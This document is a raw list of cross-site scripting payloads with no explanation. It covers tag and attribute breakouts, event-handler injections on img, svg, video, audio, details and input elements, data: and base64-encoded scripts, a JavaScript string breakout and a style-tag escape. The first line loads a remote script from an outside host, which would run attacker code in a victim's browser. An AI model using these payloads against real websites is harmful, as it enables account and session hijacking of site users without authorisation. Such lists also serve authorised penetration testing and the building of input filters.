"><script src=//0z3r00t3r.6te.net/xss.js></script>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
"><script>alert(String.fromCharCode(88,83,83))</script>
"><script>alert('XSSED')</script>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
<div onpointerenter="alert(45)">XSSED</div>
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
';alert(String.fromCharCode(88,83,83))//';
<style>
div  {
    background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
    background-color: #cccccc;
}
</style
